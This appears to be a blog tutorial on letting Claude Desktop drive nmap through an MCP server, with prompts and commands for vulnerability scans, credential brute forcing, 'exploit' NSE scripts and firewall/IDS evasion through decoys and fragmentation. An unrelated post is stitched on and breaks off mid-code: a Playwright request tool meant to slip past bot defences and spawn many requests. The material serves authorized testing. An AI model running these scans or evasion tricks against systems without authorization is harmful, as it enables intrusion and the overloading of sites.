macOS: Deep Dive into NMAP using Claude Desktop with an NMAP MCP Server

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

⚠️ Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation
nmap --version

On Linux (Ubuntu/Debian):

sudo apt update && sudo apt install -y nmap

# Verify installation
nmap --version

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

On macOS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

A widely used NMAP MCP server is available on GitHub. We’ll clone it and build it locally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build
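
Before wiring the server into Claude Desktop, you can sanity-check the build by starting it manually (assuming the build output lands in dist/index.js, which is the path the configuration below expects). MCP servers communicate over stdio, so a successful start simply sits and waits for input; press Ctrl+C to stop it.

node ~/nmap-mcp-server/dist/index.js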

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
    config = json.load(f)

if 'mcpServers' not in config:
    config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
    "command": "node",
    "args": [
        f"/Users/{username}/nmap-mcp-server/dist/index.js"
    ],
    "env": {}
}

with open(config_file, 'w') as f:
    json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF
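
After the script runs, the relevant portion of claude_desktop_config.json should look roughly like this (the exact path depends on your username and where you cloned the repository):

{
  "mcpServers": {
    "nmap": {
      "command": "node",
      "args": ["/Users/<username>/nmap-mcp-server/dist/index.js"],
      "env": {}
    }
  }
}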


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. The NMAP MCP server should now appear among Claude’s available tools (the exact indicator varies by version; look for the tools/connectors icon near the message box).

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation
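
A quick way to confirm the integration end to end is a harmless scan of NMAP’s officially sanctioned test host:

Prompt:

Use the nmap tool to run a quick scan of scanme.nmap.org and summarize any open ports you find.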

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services. Note that SYN scans (-sS) require root privileges; without them, fall back to a TCP connect scan (-sT).

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

9. SMB Vulnerability Scanning (EternalBlue and More)

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

13. FTP Anonymous Access and Vulnerabilities

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

14. Email Server Security Assessment

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Looks for XXE-style weaknesses in XML-handling endpoints. Note that stock NSE ships no dedicated XXE script, so Claude will typically approximate with related web-vulnerability scripts and suggest manual follow-up testing.

Expected NMAP command (approximate; http-vuln-cve2017-5638 actually targets the related Apache Struts flaw):

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check. The built-in NSE script covers MS12-020; checking for BlueKeep (CVE-2019-0708) usually requires a community NSE script or a dedicated scanner.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script malware,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.
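
NMAP itself can contribute here with the dns-brute NSE script, which guesses common subdomain names (dedicated tools such as amass or subfinder go further, but this keeps everything inside the same workflow):

nmap --script dns-brute example-target.com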

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure
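
NMAP alone won’t label a cloud provider, but reverse DNS names and TLS certificate subjects usually give it away; a minimal starting point, with Claude interpreting the output:

dig +short example-target.com
nmap -p 443 --script ssl-cert example-target.com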

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces
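
A hedged starting point for this kind of sweep, leaning on service detection plus a couple of device-oriented NSE scripts:

nmap -sV --script banner,upnp-info,http-title 192.168.1.0/24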

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.
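
For reference, the two scans differ only in the timing flag:

# Polite timing: slower, gentler on the target and on IDS thresholds
nmap -sV -T2 example-target.com

# Aggressive timing: faster, assumes a fast and reliable network
nmap -sV -T4 example-target.com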

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com
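
The prompt also mentions idle scans and MAC spoofing. Those map to the flags below; zombie-host.example is a placeholder for an idle host you are authorized to use, and MAC spoofing only applies when scanning from the same local Ethernet segment:

# Idle (zombie) scan
nmap -sI zombie-host.example example-target.com

# Random MAC address (local network only)
nmap --spoof-mac 0 192.168.1.50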

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!
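
Once the script exists, running it is just a matter of pointing --script at the file; my-debug-check.nse here is a hypothetical name for whatever Claude helps you write:

nmap -p 8080 --script ./my-debug-check.nse example-target.com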

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.
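
For a quick pass without writing a full parser, the grepable and XML outputs that -oA produces are easy to slice with standard tools (xmllint ships with macOS):

# Open ports per host from the grepable output
grep "open" scan_results.gnmap

# Open port numbers from the XML output
xmllint --xpath '//port[state/@state="open"]/@portid' scan_results.xml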

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
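
A minimal sketch of that workflow using ndiff, the comparison tool that ships with NMAP (file names and schedule are illustrative):

# One-time baseline
nmap -sV -oX baseline.xml example-target.com

# Weekly scan plus diff, e.g. from cron or launchd
nmap -sV -oX latest.xml example-target.com
ndiff baseline.xml latest.xml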

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: a real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper, reimplemented with Playwright, and includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium
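
A quick check that the install worked before moving on:

npx playwright --version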

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
const b = path.basename(process.argv[1]);
console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
-d, --data DATA            Request body
-H, --header HEADER        Add custom header (repeatable)
-o, --output FILE          Write response body to file
-c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
-A, --user-agent UA        Custom User-Agent
-t, --timeout SECONDS      Request timeout [default: 30]
--async                Run request(s) in background
--count N              Number of async requests to fire [default: 1, requires --async]
--no-redirect          Do not follow redirects (best-effort)
--show-headers         Print response headers
--json                 Send data as JSON (sets Content-Type)
--form                 Send data as application/x-www-form-urlencoded
-v, --verbose              Verbose output
-h, --help                 Show this help message
EXAMPLES:
${b} https://example.com
${b} --async https://example.com
${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
for (let i = 0; i < argv.length; i++) {
const a = argv[i];
switch (a) {
case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
case '-d': case '--data': args.data = String(argv[++i] || ''); break;
case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
case '-o': case '--output': args.output = String(argv[++i] || ''); break;
case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
case '--async': args.async = true; break;
case '--count': args.count = Number(argv[++i] || '1'); break;
case '--no-redirect': args.followRedirects = false; break;
case '--show-headers': args.showHeaders = true; break;
case '--json': args.contentType = 'application/json'; break;
case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
case '-v': case '--verbose': args.verbose = true; break;
case '-h': case '--help': usage(); process.exit(0);
default:
if (!args.url && !a.startsWith('-')) args.url = a; else {
console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
process.exit(1);
}
}
}
return args;
}
function parseHeaderList(list) {
const out = {};
for (const h of list) {
const idx = h.indexOf(':');
if (idx === -1) continue;
const name = h.slice(0, idx).trim();
const value = h.slice(idx + 1).trim();
if (!name) continue;
out[name] = value;
}
return out;
}
function buildDefaultHeaders(userAgent) {
const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
return {
'User-Agent': ua,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.9',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Cache-Control': 'max-age=0'
};
}
async function performRequest(opts) {
// Cookie file handling
const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
const cookieFile = opts.cookieFile || defaultCookie;
// Launch Chromium
const browser = await chromium.launch({ headless: true });
const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
// Load cookies if present
if (fs.existsSync(cookieFile)) {
try {
const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
if (ss.cookies?.length) await context.addCookies(ss.cookies);
} catch {}
}
const request = context.request;
// Build request options
const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
if (opts.data) {
// Playwright will detect JSON strings vs form strings by headers
reqOpts.data = opts.data;
}
if (opts.followRedirects === false) {
// Best-effort: limit redirects to 0
reqOpts.maxRedirects = 0;
}
const method = opts.method.toUpperCase();
let resp;
try {
if (method === 'GET') resp = await request.get(opts.url, reqOpts);
else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
else {
console.error(`${RED}Unsupported method: ${method}${NC}`);
await browser.close();
process.exit(2);
}
} catch (e) {
console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
await browser.close();
process.exit(3);
}
// Persist cookies
try {
const state = await context.storageState();
fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
} catch {}
// Output
const status = resp.status();
const statusText = resp.statusText();
const headers = await resp.headers();
const body = await resp.text();
if (opts.verbose) {
console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
}
if (opts.showHeaders) {
// Print a simple status line and headers to stdout before body
console.log(`HTTP ${status} ${statusText}`);
for (const [k, v] of Object.entries(headers)) {
console.log(`${k}: ${v}`);
}
console.log('');
}
if (opts.output) {
fs.writeFileSync(opts.output, body);
} else {
process.stdout.write(body);
}
if (!resp.ok()) {
console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
await browser.close();
process.exit(4);
}
await browser.close();
}
async function main() {
const argv = process.argv.slice(2);
const opts = parseArgs(argv);
if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
if ((opts.count || 1) > 1 && !opts.async) {
console.error(`${RED}Error: --count requires --async${NC}`);
process.exit(1);
}
if (opts.count < 1 || !Number.isInteger(opts.count)) {
console.error(`${RED}Error: --count must be a positive integer${NC}`);
process.exit(1);
}
if (opts.async) {
// Fire-and-forget background processes
// Strip --async and the --count value pair so each child runs a single synchronous request
const rawArgs = process.argv.slice(2);
const baseArgs = [];
for (let j = 0; j < rawArgs.length; j++) {
if (rawArgs[j] === '--async') continue;
if (rawArgs[j] === '--count') { j++; continue; }
baseArgs.push(rawArgs[j]);
}
const pids = [];
for (let i = 0; i < opts.count; i++) {
const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
pids.push(child.pid);
child.unref();
}
if (opts.verbose) {
console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
}
if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
process.exit(0);
